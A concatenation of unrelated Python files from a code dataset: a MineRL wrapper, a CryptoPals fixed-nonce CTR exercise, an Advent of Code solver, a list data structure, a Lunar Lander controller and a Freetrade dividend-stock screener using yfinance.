\"\"\"An interface to start environment and agent.\n\n :param policy: including \"state_function\", \"action_function\", \"reward_function\", \"observation_space\" transition\n methods.\n :param tasks_name: The task developer intend to optimize.\n \"\"\"\n\n self.policy = policy\n\n def run(self, policy, task=\"CSR\", data=\"\", training_iterations=20):\n if task == \"CSR\":\n CSR(policy, data, training_iterations).run()\n\n def Config(\n self, policy, task=\"CSR\", iterations=2, benchmark=\"\", training_iterations=20\n ):\n global best_config\n if task == \"CSR\":\n best_config = CSR(policy, benchmark, training_iterations).Config(iterations)\n\n return best_config\n","repo_name":"HuantWang/SUPERSONIC","sub_path":"SuperSonic/utils/engine/tasks_engine.py","file_name":"tasks_engine.py","file_ext":"py","file_size_in_byte":6767,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"37"} +{"seq_id":"29977404021","text":"import minerl\nimport torch\nimport numpy as np\nimport gym\n\nclass continousEnv(minerl.env.core.MineRLEnv):\n def __init__(self, xml):\n super().__init__(\n xml,\n gym.spaces.Box(low=0, high=255, shape=(64, 64, 3), dtype=np.uint8),\n gym.spaces.Box(low=-1, high=1, shape=(5,), dtype=np.uint8),\n None\n )\n def _setup_spaces(self, observation_space, action_space):\n self.observation_space = observation_space\n self.action_space = action_space\n\n def _process_action(self, action_in) -> str:\n a = action_in\n command_array = [f'move {a[0]}', f'jump {a[1]}', f'attack {a[2]}', f'camera {a[3]} {a[4]}'] \n\n print(\"\\n\".join(command_array), \"\\n\")\n return \"\\n\".join(command_array)\n\n def _process_observation(self, pov, info):\n\n pov = np.frombuffer(pov, dtype=np.uint8)\n pov = pov.reshape((self.height, self.width, self.depth))\n return pov","repo_name":"ysarda/minezero","sub_path":"env_wrappers.py","file_name":"env_wrappers.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38601296539","text":"DoubleBuffer = None\nDummyProcessor = None\nExternalProcessor = None\n\ndef alias():\n global DoubleBuffer, DummyProcessor, ExternalProcessor\n DoubleBuffer = double_buffer.DoubleBuffer\n DummyProcessor = dummy.DummyProcessor\n ExternalProcessor = external_processor.ExternalProcessor\n\nif '__imported__' in locals():\n import imp\n imp.reload(double_buffer)\n imp.reload(external_processor)\n imp.reload(dummy)\n alias()\nelse:\n __imported__ = True\n from . import double_buffer\n from . import external_processor\n from . 
import dummy\n alias()\n","repo_name":"Kupoman/BlenderRealtimeEngineAddon","sub_path":"brte/processors/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"37"} +{"seq_id":"70172127467","text":"import base64\nimport sys\nsys.path.insert(1, \"../../\")\nimport helperFunctions as helper\nimport set1.chall_6.breakRepeatingKeyXor as Vigenere\nimport set1.chall_3.singleByteXor as SingleByteXor\nimport set3.chall_18.implementCtrMode as AES_CTR\n\n\ndef generateCts(ipFile):\n key = helper.getRandBytes(16)\n nonce = 0\n cts = []\n for line in ipFile:\n pt = line[:len(line)-1]\n pt = base64.b64decode(pt)\n ct = AES_CTR.AES_CTR(pt, key, nonce)\n cts.append(ct)\n return cts\n\n\ndef breakEnc(cts):\n minLen = 1000\n lines = 0\n pts = []\n for x in cts:\n if len(x) < minLen:\n minLen = len(x)\n vigenereInput = bytes(''.encode('utf-8'))\n for x in cts:\n vigenereInput += x[:minLen]\n lines += 1\n vigenerePt = Vigenere.breakRepeatingKeyXor(vigenereInput)\n\n for i in range(lines):\n known = bytes(\"Known: \".encode('utf-8'))\n unknown = bytes(\" Unknown: \".encode('utf-8'))\n ct = cts[i]\n pt = known + vigenerePt[i*16:(i+1)*16] + unknown + ct[minLen:]\n pts.append(pt)\n\n return pts\n\n\ndef breakEnc2(cts):\n maxLen = -1\n noOfCts = len(cts)\n for x in cts:\n if len(x) > maxLen:\n maxLen = len(x)\n pts = [bytes(''.encode('latin1')) for i in range(noOfCts)]\n for i in range(maxLen):\n ctInput = bytes(''.encode('latin1'))\n for j in range(noOfCts):\n if i < len(cts[j]):\n ctInput += bytes([cts[j][i]])\n ptOutput = SingleByteXor.identifySingleByteXor(ctInput.hex())\n ptIndex = 0\n for j in range(noOfCts):\n if i < len(cts[j]):\n if ptOutput[0][1][ptIndex] == 0:\n pts[j] += bytes(' '.encode('latin1'))\n else:\n pts[j] += bytes([ptOutput[0][1][ptIndex]])\n ptIndex += 1\n return pts\n\n\ndef main():\n ipFile = open(\"input.txt\", 'r')\n cts = generateCts(ipFile)\n ipFile.close()\n pts = breakEnc2(cts)\n for x in pts:\n print(x)\n\n\n\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"D-setia/CryptoPals","sub_path":"set3/chall_19/breakFixedNonceCtrUsingSubstitutions.py","file_name":"breakFixedNonceCtrUsingSubstitutions.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36099878890","text":"#########################\n## Advent of Code 2020 ##\n#########################\n# Steven Small #\n# stvnsmll #\n# 05.12.20 #\n# #\n# Day 5, Part 1 #\n#########################\n\n\ndef main(test):\n if test == 't':\n testing = 1\n input_file = \"./d05/seatplan_testing.txt\"\n else:\n testing = 0\n input_file = \"./d05/seatplan.txt\"\n\n # Using readline()\n seatplan_file = open(input_file, 'r')\n seatcount = 0\n maxseatID = 0\n\n while True:\n # Get next line from file\n seatdata = seatplan_file.readline().strip()\n\n # if line is empty end of file is reached\n if not seatdata:\n break\n\n # print(seatdata)\n seatrow = seatdata[:-3]\n seatcol = seatdata[-3:]\n seatID = getseatID(seatrow, seatcol)\n # print(\"Row Info: \" + seatrow + \", Col Info: \" + seatcol)\n # print(\" Seat ID: \" + str(seatID) + \"\\n\")\n if seatID > maxseatID:\n maxseatID = seatID\n\n seatcount += 1\n\n seatplan_file.close()\n\n\n print(\"\\nHighest Seat ID:\", maxseatID)\n print(\"Total Seat Count:\", seatcount)\n\n print('\\n\\ndone')\n return maxseatID\n\ndef getseatID(row, col):\n minrow = 0\n maxrow = 128\n rowmid 
= 0\n    for code in row:\n        # print(\"Min: \" + str(int(minrow)) + \", Max: \" + str(int(maxrow)))\n        rowmid = (minrow + maxrow) / 2\n        # print(\" Mid: \" + str(int(rowmid)))\n        # print(code)\n        if code == \"F\":\n            maxrow = rowmid\n        else:\n            minrow = rowmid\n    if row[:-1] == \"F\":\n        row = maxrow\n    else:\n        row = minrow\n    # print(int(row))\n\n    mincol = 0\n    maxcol = 8\n    colmid = 0\n    for code in col:\n        # print(code)\n        colmid = (mincol + maxcol) / 2\n        # print(colmid)\n        if code == \"L\":\n            maxcol = colmid\n        else:\n            mincol = colmid\n    col = (mincol + maxcol) / 2\n\n    seatID = (row * 8) + col\n\n    return int(seatID)\n\n\n\nif __name__ == \"__main__\":\n    main(\"r\")","repo_name":"stvnsmll/AoC","sub_path":"AoC_2020/d05/AoC2020_05_1.py","file_name":"AoC2020_05_1.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"31335135624","text":"class ListaException(Exception):\n    def __init__(self, msg):\n        super().__init__(msg)\n\n\n\n\nclass ListaSequencial:\n\n    def __init__(self):\n        self.__dados = []\n    \n    def vazia(self):\n        return len(self.__dados) == 0\n    \n\n#    def cheia(self):\n#        pass\n\n    def tamanho(self):\n        return len(self.__dados)\n\n    def busca(self, dado):\n        '''\n        for i in range(self.__dados):\n            if self.__dados[i] == dado:\n                return i+1\n        return None\n        '''\n        try:\n            return self.__dados.index(dado) + 1\n        except ValueError:\n            raise ListaException(f'The value {dado} is not in the list')\n        except:\n            raise\n\n\n\n\n\n    # operation that receives the position of a list element and returns\n    # the content (data) stored there\n    def elemento(self, posicao):\n        # negative value?\n        # invalid position IndexError\n        # position with a data type other than int TypeError\n        try:\n            assert posicao > 0\n            return self.__dados[posicao-1]\n        except TypeError:\n            raise ListaException('The posicao argument must be an integer value')\n        except IndexError:\n            raise ListaException('The position given for the query is invalid')\n        except AssertionError:\n            raise ListaException('A negative position is not valid for the list')\n        except:\n            raise\n\n    # function that inserts a value into the list at the given (valid) position\n    def inserir(self, posicao, dado):\n        try:\n            assert posicao > 0\n            self.__dados.insert(posicao-1, dado)\n        except TypeError:\n            raise ListaException('The posicao argument must be an integer value')\n        except IndexError:\n            raise ListaException('The position given for the query is invalid')\n        except AssertionError:\n            raise ListaException('A negative position is not valid for the list')\n        except:\n            raise\n\n    # operation that removes an element from the list and returns its value\n    def remover(self, posicao):\n        try:\n            assert posicao > 0\n            if( self.vazia()):\n                raise ListaException('Empty list. 
Cannot remove elements')\n            valor = self.__dados[posicao-1]\n            del self.__dados[posicao-1]\n            return valor\n        except TypeError:\n            raise ListaException('The posicao argument must be an integer value')\n        except IndexError:\n            raise ListaException('The position given for the query is invalid')\n        except AssertionError:\n            raise ListaException('A negative position is not valid for the list')\n        except:\n            raise\n\n    # special method that returns the object's internal description\n    def __str__(self):\n        return self.__dados.__str__()\n    \n    # method that prints the contents of the sequential list\n    def imprimir(self):\n        print(self.__str__())\n\n    # method that changes the content stored at a given position in the list\n    def modificar(self, posicao, novoValor):\n        try:\n            assert posicao > 0\n            if( self.vazia()):\n                raise ListaException('Empty list. Cannot remove elements')\n            self.__dados[posicao-1] = novoValor\n            return True\n        except TypeError:\n            raise ListaException('The posicao argument must be an integer value')\n        except IndexError:\n            raise ListaException('The position given for the query is invalid')\n        except AssertionError:\n            raise ListaException('A negative position is not valid for the list')\n        except:\n            raise\n\n# testing whether the sequential list is acting as a module (library) or whether the \nif (__name__ == '__main__'):\n    print('Running the main program from the ListaSequencial class')\n    l1 = ListaSequencial()\n    if (l1.vazia()):\n        print('List is empty')\n    \n    print('Size: ', l1.tamanho())\n\n    for i in range(10):\n        l1.inserir(1,i*10)\n    print(l1)\n\n    valor = l1.remover(2)\n    print(valor)\n    print(l1)\n\n    print()\n    l1.imprimir()\n    l1.modificar(5,44)\n    l1.imprimir()\n\n    #l1.inserir(-10,99)\n    print(l1)\n\n    try:\n        #print(l1.busca(55))\n        #print(l1.elemento(5))\n        #l1.inserir(5,111)\n        #l1.remover(1)\n        l1.modificar(100, 999)\n        print(l1)\n    except ListaException as li:\n        print(li)\n    \n\n","repo_name":"gabrielmacaubas/IFPB","sub_path":"ED/semana-08/ListaSequencialPreparativo.py","file_name":"ListaSequencialPreparativo.py","file_ext":"py","file_size_in_byte":4557,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"38392154255","text":"# Lunar Lander: AI-controlled play\n\n# Instructions:\n#   Land the rocket on the platform within a distance of plus/minus 20, \n#   with a horizontal and vertical speed less than 20\n#\n# Controlling the rocket:\n#    arrows  : Turn booster rockets on and off\n#    r       : Restart game\n#    q / ESC : Quit\n\nfrom LunarLander import *\nimport time\nimport numpy as np\n\nenv = LunarLander()\nenv.reset()\nexit_program = False\nepisodes = 100000\nrender = False\n# while not exit_program:\nwon = 0\nlost = 0\nend_position = []\nrewards = []\ntime_taken = []\nboost = left = right = False  # initial control state for the first env.step call\nfor i in range(episodes):\n    env.reset()\n    done = False\n    start_time = time.time()\n    while not done:\n        if render:\n            env.render()\n        (x, y, xspeed, yspeed), reward, done = env.step((boost, left, right))\n\n        boost = False\n        left = False\n        right = False\n\n        max_speed = min(40, max(abs(x), 10))\n        x_limit = 15\n\n        if xspeed > max_speed:\n            right = True\n        if xspeed < -max_speed:\n            left = True\n\n        if x > x_limit and not left:\n            right = True\n        elif x < - x_limit and not right:\n            left = True\n\n\n        # maximum y speed\n        if yspeed > 60:\n            boost = True\n\n        # boost threshold\n        if y < 120:\n            boost = True\n\n        # Process game events\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                exit_program = True\n            if event.type == pygame.KEYDOWN:\n                if event.key in 
[pygame.K_ESCAPE, pygame.K_q]:\n                    exit_program = True\n                if event.key == pygame.K_UP:\n                    boost = True\n                if event.key == pygame.K_DOWN:\n                    boost = False\n                if event.key == pygame.K_RIGHT:\n                    left = False if right else True\n                    right = False\n                if event.key == pygame.K_LEFT:\n                    right = False if left else True\n                    left = False\n                if event.key == pygame.K_r:\n                    boost = False\n                    left = False\n                    right = False\n                    env.reset()\n    if abs(x) <= 20 and abs(xspeed) <= 20 and abs(yspeed) <= 20:\n        won += 1\n    else:\n        lost += 1\n\n    time_taken.append((time.time() - start_time)*1000)\n\n    rewards.append(reward)\n    end_position.append((x,y))\nnp.save('won.npy', won)\nnp.save('lost.npy', lost)\nnp.save('rewards.npy', rewards)\nnp.save('time_taken.npy', time_taken)\nnp.save('end_position.npy', end_position)\n\nenv.close()\n\n# x is positive to the right of the platform and negative to the left of it\n# xspeed is positive moving right and negative moving left\n\n# how long does it take\n# average score\n# how precisely it lands","repo_name":"kriskruse/Lunar-Lander-AI","sub_path":"AI_LunarLander.py","file_name":"AI_LunarLander.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"71861879788","text":"import requests\nimport subprocess\nfrom pathlib import Path\nimport os\nimport numpy as np\nimport csv\nimport time\nfrom pip._internal import main as pip\n\ntry:\n    import yfinance as yf\nexcept:\n    pip(['install', '--user', 'yfinance'])\nfinally:\n    import yfinance as yf\n\ntry:\n    from tabulate import tabulate\nexcept:\n    pip(['install', '--user', 'tabulate'])\nfinally:\n    from tabulate import tabulate\n\ntry:\n    from progressbar import ProgressBar\nexcept:\n    pip(['install', '--user', 'progressbar'])\nfinally:\n    from progressbar import ProgressBar, AdaptiveETA, Bar, Percentage\nDataStore = \"DataStore\"\nOutputStore = \"Output\"\nsheetName = os.path.join(DataStore, 'FreeTradeStockUniverse.csv')\nmainStore = os.path.join(DataStore, 'DataStore.csv')\nrejectStore = os.path.join(DataStore, \"rejected.csv\")\nlistStore = os.path.join(DataStore, \"listStore.csv\")\nStockListURL = 'http://freetrade.io/stock-universe'\nsheetUrl = 'https://docs.google.com/spreadsheets/d/1-5eYQWyWLyRCiqgHpiqjSmCayLjODvDvVEHWRjW5VjM/export?format=csv&id=1-5eYQWyWLyRCiqgHpiqjSmCayLjODvDvVEHWRjW5VjM'\nsheetData = ''\nlistData = []\nDividendStockListStored = []\nrejectedStockList = []\n\nclass Stock:\n    def __init__(self, name, shortDescription, ticker, assetClass, currency, isin, longDescription, dYield=None, dGrowthRate=None, peRatio=None):\n        self.name = name\n        self.shortDescription = shortDescription\n        self.ticker = ticker\n        self.assetClass = assetClass\n        self.currency = currency\n        self.isin = isin\n        self.longDescription = longDescription\n        self.dYield = dYield\n        self.dGrowthRate = dGrowthRate\n        self.peRatio = peRatio\n        try:\n            self.yfData = yf.Ticker(ticker)\n        except:\n            self.yfData = 0\n\n\nclass FilterType:\n    def __init__(self, name, dYield=None, dGrowthRate=None, peRatio=None):\n        self.name = name\n        self.dYield = dYield\n        self.dGrowthRate = dGrowthRate\n        self.peRatio = peRatio\n        self.outputName = name + \".csv\"\n\n\ndefaultListData = [\n    FilterType(\"cream\", 0.03, 0.04, 25),\n    FilterType(\"highYield\", 0.05, None, None),\n    FilterType(\"highYieldGrowth\", 0.05, 0.04, 25),\n    FilterType(\"dividendGrowth\", 0.024, 0.035, 40)\n]\n\nclear = lambda: subprocess.call('cls||clear', shell=True)\n\ndef getSheet():\n    response = requests.get(sheetUrl)\n    assert 
response.status_code == 200, 'Wrong status code'\n return response.content.decode(\"utf-8\")\n\n\ndef saveCsv(content, name):\n sheetHandle = open(name, 'w')\n sheetHandle.write(content)\n sheetHandle.close()\n\n\ndef sheetToStockList(fileName):\n StockList = []\n with open(fileName, 'r') as sheet:\n reader = csv.reader(sheet)\n dumbList = list(reader)\n for row in dumbList:\n if(row[0] == \"Name\"):\n continue\n StockList.append(Stock(row[0], row[1], row[2], row[3], row[4], row[5], row[6]))\n return StockList\n\n\ndef outputSheetToStockList(fileName):\n StockList = []\n with open(fileName, 'r') as sheet:\n reader = csv.reader(sheet)\n dumbList = list(reader)\n for row in dumbList:\n if(row[0] == \"Name\"):\n continue\n StockList.append(Stock(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8], row[9]))\n return StockList\n\n\ndef dividendGrowthRate(stock):\n divs = stock.yfData.dividends.values\n if(len(divs) < 2):\n return 'skip'\n growth_rate = np.mean(np.exp(np.diff(np.log(divs))) - 1)\n return growth_rate\n\n\ndef init():\n global sheetData\n global DividendStockListStored\n global rejectedStockList\n clear()\n print(\"Initialising BoneMeal...\")\n if not (Path.exists(Path(DataStore))):\n os.mkdir(DataStore)\n if not (Path.exists(Path(OutputStore))):\n os.mkdir(OutputStore)\n try:\n with open(sheetName, 'r') as sheetCurrentHandle:\n print(\"Checking for updates to Freetrade Stock Universe...\")\n try:\n sheetCurrent = sheetCurrentHandle.read().replace('\\r\\n', '\\n')\n sheet = getSheet().replace('\\r\\n', '\\n')\n if not (sheetCurrent == sheet):\n print(\"Update found!\")\n print(\"Applying update..\")\n saveCsv(sheet, sheetName)\n if(Path.exists(Path(mainStore))):\n os.remove(mainStore)\n print(\"Update applied!\")\n except:\n print(\"Couldn't get new sheet, skipping update\")\n except:\n print(\"FreeTrade Stock Uninverse not found\")\n print(\"getting it...\")\n sheet = getSheet()\n saveCsv(sheet, sheetName)\n if(Path.exists(Path(mainStore))):\n os.remove(mainStore)\n finally:\n print(\"Got FreeTrade Stock Universe!\")\n sheetHandle = open(sheetName, 'r')\n sheetData = sheetHandle.read()\n sheetHandle.close()\n\n\n try:\n _ = open(mainStore, 'r')\n _ = open(rejectStore, \"r\")\n except:\n if(Path.exists(Path(mainStore))):\n os.remove(mainStore)\n if(Path.exists(Path(rejectStore))):\n os.remove(rejectStore)\n print(\"Dividend data for stocks not found\")\n print(\"getting it...\")\n stockList = sheetToStockList(sheetName)\n dividendStockList(stockList)\n finally:\n print(\"Got dividend data for stocks!\")\n DividendStockListStored = outputSheetToStockList(mainStore)\n rejectedStockList = outputSheetToStockList(rejectStore)\n\n print(\"Initialisation complete!\")\n\n\ndef getYDGPEforStock(stock):\n dYield = 0\n dGrowthRate = 0\n peRatio = 0\n ticker = stock.ticker\n try:\n dYield = stock.yfData.info['trailingAnnualDividendYield']\n except:\n if(stock.currency=='GBP'):\n ticker = stock.ticker+'.L'\n stock.yfData = yf.Ticker(stock.ticker+'.L')\n try:\n dYield = stock.yfData.info['trailingAnnualDividendYield']\n except:\n return 'skip'\n else:\n return 'skip'\n\n try:\n dGrowthRate = dividendGrowthRate(stock)\n if(dGrowthRate == 'skip'):\n return 'skip'\n except:\n return 'skip'\n\n try:\n peRatio = stock.yfData.info['trailingPE']\n except:\n peRatio = '?'\n\n return {'dYield': dYield, 'dGrowthRate': dGrowthRate, 'peRatio': peRatio, 'ticker': ticker}\n\n\ndef dividendStockList(stockList):\n widgets = [Percentage(),\n ' ', Bar(),\n ' ', AdaptiveETA()]\n pBar = 
ProgressBar(widgets=widgets)\n dStockList = []\n print(\"populating stocks with dividend data..\")\n rejectedStockList = []\n for stock in pBar(stockList):\n data = getYDGPEforStock(stock)\n if(data == 'skip'):\n rejectedStockList.append(stock)\n else:\n stock.dYield = data['dYield']\n stock.dGrowthRate = data['dGrowthRate']\n stock.peRatio = data['peRatio']\n stock.ticker = data['ticker']\n dStockList.append(stock)\n writeOuputCsv(dStockList, mainStore, isDataStore=True)\n writeOuputCsv(rejectedStockList, rejectStore, isDataStore=True)\n return dStockList\n\n\ndef stockToList(stock):\n return [stock.name, stock.shortDescription, stock.ticker, stock.assetClass, stock.currency, stock.isin, stock.longDescription, stock.dYield, stock.dGrowthRate, stock.peRatio]\n\n\ndef stockListToCsvList(stockList):\n csvList = []\n header = [\"Name\", \"Short Description\", \"Ticker\", \"Asset Class\", \"Currency\", \"ISIN\", \"Long Description\", \"Yield\", \"Growth Rate\", \"PE Ratio\"]\n csvList.append(header)\n for stock in stockList:\n csvList.append(stockToList(stock))\n return csvList\n\n\ndef writeOuputCsv(stockList, filename, isDataStore=False):\n csvList = stockListToCsvList(stockList)\n if(isDataStore):\n outPath = filename\n else:\n outPath = os.path.join(OutputStore, filename)\n with open(outPath, 'w', newline='') as myfile:\n wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)\n for row in csvList:\n wr.writerow(row)\n\n\ndef indexOfStock(stockList, isin):\n i = 0\n for stock in stockList:\n if(stock.isin == isin):\n return i\n i += 1\n return -1\n\n\ndef filterStocklist(stockList, dYield=0.01, dGrowthRate=0, peRatio=None):\n try:\n dYield = float(dYield)\n except:\n dYield = None\n try:\n dGrowthRate = float(dGrowthRate)\n except:\n dGrowthRate = None\n try:\n peRatio = float(peRatio)\n except:\n peRatio = None\n\n filterList = []\n for stock in stockList:\n try:\n if not (dYield is None):\n if(float(stock.dYield) >= float(dYield)):\n if not (dGrowthRate is None):\n if(float(stock.dGrowthRate) >= float(dGrowthRate)):\n if not (peRatio is None):\n if(float(stock.peRatio) <= float(peRatio)):\n filterList.append(stock)\n else:\n filterList.append(stock)\n else:\n if not (peRatio is None):\n if(float(stock.peRatio) <= float(peRatio)):\n filterList.append(stock)\n else:\n filterList.append(stock)\n else:\n if not (dGrowthRate is None):\n if(float(stock.dGrowthRate) >= float(dGrowthRate)):\n if not (peRatio is None):\n if(float(stock.peRatio) <= float(peRatio)):\n filterList.append(stock)\n else:\n filterList.append(stock)\n else:\n if not (peRatio is None):\n if(float(stock.peRatio) <= float(peRatio)):\n filterList.append(stock)\n else:\n filterList.append(stock)\n except:\n pass\n\n return filterList\n\ndef CustomSearch():\n print(\"Enter custom filter options\")\n print(\"Leave blank to ignore option\")\n dYield = input(\"Dividend Yield >= : \")\n if(dYield == \"\"):\n dYield = None\n dGrowthRate = input(\"Dividend Growth Rate >= : \")\n if(dGrowthRate == \"\"):\n dGrowthRate = None\n peRatio = input(\"PE Ratio <= : \")\n if(peRatio == \"\"):\n peRatio = None\n name = input(\"Name for output file : \")\n if(name == \"\"):\n name = round(time.time())\n name = str(name)+\".csv\"\n writeOuputCsv(filterStocklist(DividendStockListStored, dYield=dYield, dGrowthRate=dGrowthRate, peRatio=peRatio), name)\n\n\ndef fullRefresh():\n if(Path.exists(Path(sheetName))):\n os.remove(sheetName)\n try:\n init()\n except:\n pass\n\n\n\ndef produceLists(filterList):\n for f in filterList:\n out = 
filterStocklist(DividendStockListStored, dYield=f.dYield, dGrowthRate=f.dGrowthRate, peRatio=f.peRatio)\n writeOuputCsv(out, f.outputName)\n\n\ndef saveListData():\n global listData\n csvData = []\n for f in listData:\n csvData.append([f.name, f.dYield, f.dGrowthRate, f.peRatio])\n\n with open(listStore, 'w', newline='') as lsHandle:\n wr = csv.writer(lsHandle, quoting=csv.QUOTE_ALL)\n for row in csvData:\n wr.writerow(row)\n\n\ndef addFilter():\n global listData\n getting = True\n while getting:\n print(\"please enter a name for the new filter\")\n print(\"type cancel to cancel\")\n name = input(\"> \")\n if(name == \"cancel\"):\n return\n if(len(name)>0):\n getting = False\n else:\n print(\"you must enter a name for a new filter\")\n input(\"press enter to re enter name\")\n\n\n getting = True\n while getting:\n print(\"please enter the dividend yield for the new filter\")\n print(\"leave this blank to ignore this filter\")\n dYield = input(\"> \")\n if not (dYield == \"\"):\n try:\n dYield = float(dYield)\n if(dYield >= 1 or dYield <= 0):\n print(\"dividend yield must be a valid decimal between 0 and 1\")\n input(\"press enter to re enter dividend yield\")\n else:\n getting = False\n except:\n print(\"dividend yield must be a valid decimal between 0 and 1\")\n input(\"press enter to re enter dividend yield\")\n else:\n dYield = None\n getting = False\n\n getting = True\n while getting:\n print(\"please enter the dividend growth rate for the new filter\")\n print(\"leave this blank to ignore this filter\")\n dGrowthRate = input(\"> \")\n if not (dGrowthRate == \"\"):\n try:\n dGrowthRate = float(dGrowthRate)\n if(dGrowthRate >= 1 or dGrowthRate <= 0):\n print(\"dividend growth rate must be a valid decimal between 0 and 1\")\n input(\"press enter to re enter dividend growth rate\")\n else:\n getting = False\n except:\n print(\"dividend growth rate must be a valid decimal between 0 and 1\")\n input(\"press enter to re enter dividend growth rate\")\n else:\n dGrowthRate = None\n getting = False\n\n getting = True\n while getting:\n print(\"please enter the PE ratio for the new filter\")\n print(\"leave this blank to ignore this filter\")\n peRatio = input(\"> \")\n if not (peRatio == \"\"):\n try:\n peRatio = float(peRatio)\n if(peRatio <= 0 or peRatio >= 100):\n print(\"PE ratio must be a valid decimal greater than 0 and less than 100\")\n input(\"press enter to re enter PE ratio\")\n else:\n getting = False\n except:\n print(\"PE ratio must be a valid decimal greater than 0 and less than 100\")\n input(\"press enter to re enter PE ratio\")\n else:\n peRatio = None\n getting = False\n\n newFilter = FilterType(name, dYield=dYield, dGrowthRate=dGrowthRate, peRatio=peRatio)\n listData.append(newFilter)\n saveListData()\n\ndef editFilter():\n global listData\n getting = True\n while getting:\n print(\"please enter the name of the filter you want to edit\")\n print(\"leave blank to cancel\")\n name = input(\"> \")\n i = 0\n if(len(name)>0):\n for f in listData:\n if(name == f.name):\n break\n else:\n i += 1\n if(name == listData[i].name):\n gettingg = True\n while gettingg:\n print(\"please enter a new name for \" + name)\n newName = input(\"> \")\n if(len(newName)>0):\n gettingg = False\n else:\n print(\"you must enter a new name for \" + name)\n input(\"press enter to re enter name\")\n\n gettingg = True\n while gettingg:\n print(\"please enter a new dividend yield for \" + newName)\n print(\"leave this blank to ignore this filter\")\n dYield = input(\"> \")\n if not (dYield == \"\"):\n 
try:\n dYield = float(dYield)\n if(dYield >= 1 or dYield <= 0):\n print(\"dividend yield must be a valid decimal between 0 and 1\")\n input(\"press enter to re enter dividend yield\")\n else:\n gettingg = False\n except:\n print(\"dividend yield must be a valid decimal between 0 and 1\")\n input(\"press enter to re enter dividend yield\")\n else:\n dYield = None\n gettingg = False\n\n gettingg = True\n while gettingg:\n print(\"please enter a dividend growth rate for \" + newName)\n print(\"leave this blank to ignore this filter\")\n dGrowthRate = input(\"> \")\n if not (dGrowthRate == \"\"):\n try:\n dGrowthRate = float(dGrowthRate)\n if(dGrowthRate >= 1 or dGrowthRate <= 0):\n print(\"dividend growth rate must be a valid decimal between 0 and 1\")\n input(\"press enter to re enter dividend growth rate\")\n else:\n gettingg = False\n except:\n print(\"dividend growth rate must be a valid decimal between 0 and 1\")\n input(\"press enter to re enter dividend growth rate\")\n else:\n dGrowthRate = None\n gettingg = False\n\n gettingg = True\n while gettingg:\n print(\"please enter a new PE ratio for \" + newName)\n print(\"leave this blank to ignore this filter\")\n peRatio = input(\"> \")\n if not (peRatio == \"\"):\n try:\n peRatio = float(peRatio)\n if(peRatio <= 0 or peRatio >= 100):\n print(\"PE ratio must be a valid decimal greater than 0 and less than 100\")\n input(\"press enter to re enter PE ratio\")\n else:\n gettingg = False\n except:\n print(\"PE ratio must be a valid decimal greater than 0 and less than 100\")\n input(\"press enter to re enter PE ratio\")\n else:\n peRatio = None\n gettingg = False\n listData[i].name = newName\n listData[i].dYield = dYield\n listData[i].dGrowthRate = dGrowthRate\n listData[i].peRatio = peRatio\n getting = False\n else:\n print(\"you must enter a name of a filter to edit\")\n input(\"press enter to re enter name\")\n else:\n return\n saveListData()\n\n\ndef removeFilter():\n global listData\n getting = True\n while getting:\n print(\"please enter the name of the filter you want to edit\")\n print(\"leave blank to cancel\")\n name = input(\"> \")\n i = 0\n if(len(name)>0):\n for f in listData:\n if(name == f.name):\n break\n else:\n i += 1\n if(name == listData[i].name):\n del listData[i]\n getting = False\n else:\n print(\"you must enter a name of a filter to remove\")\n input(\"press enter to re enter name\")\n else:\n return\n saveListData()\n\n\ndef clearFilters():\n global listData\n listData = []\n saveListData()\n\n\ndef loadFilterList():\n global listData\n listData = []\n if not (Path.exists(Path(listStore))):\n f = open(listStore, 'w')\n f.close()\n with open(listStore, 'r') as ls:\n reader = csv.reader(ls)\n filterList = list(reader)\n for row in filterList:\n listData.append(FilterType(row[0], row[1], row[2], row[3]))\n return listData\n\n\ndef editLists():\n table = [\n [\"Select option below\"],\n [\"s - Show list of custom filters\"],\n [\"a - Add a new filter to the list\"],\n [\"e - Edit a filter in the list\"],\n [\"r - Remove a filter from the list\"],\n [\"clear - Clear entire filter list\"],\n [\"x - Exit\"]\n ]\n getting = True\n while getting:\n loadFilterList()\n clear()\n print(tabulate(table, headers=\"firstrow\", tablefmt=\"rst\"))\n command = input(\"> \")\n try:\n command = str.lower(command)\n if(command == \"x\"):\n clear()\n return\n elif(command == \"s\"):\n filterList = [\n [\"Name\", \"Yield\", \"Growth Rate\", \"PE Ratio\"]\n ]\n for f in listData:\n filterList.append([f.name, f.dYield, f.dGrowthRate, 
f.peRatio])\n\n print(tabulate(filterList, headers=\"firstrow\", tablefmt=\"rst\"))\n input(\"press enter to reload menu\")\n clear()\n continue\n elif(command == \"a\"):\n addFilter()\n elif(command == \"e\"):\n editFilter()\n elif(command == \"r\"):\n removeFilter()\n elif(command == \"clear\"):\n clearFilters()\n else:\n print(\"please enter a valid command.\")\n input(\"press enter to reload menu\")\n clear()\n continue\n except:\n print(\"please enter a valid command.\")\n input(\"press enter to reload menu\")\n clear()\n continue\n\n\ndef Menu():\n table = [\n [\"Select option below\"],\n [\"1 - Refresh data\"],\n [\"2 - Produce Lists\"],\n [\"3 - Produce Default Lists\"],\n [\"4 - Edit Lists\"],\n [\"5 - Custom Search\"],\n [\"x - Exit\"]]\n getting = True\n while getting:\n clear()\n print(tabulate(table, headers=\"firstrow\", tablefmt=\"rst\"))\n command = input(\"> \")\n try:\n if(str.lower(command) == \"x\"):\n return\n command = int(command)\n if(command > 0 and command < 6):\n if(command == 1):\n fullRefresh()\n if(command == 2):\n 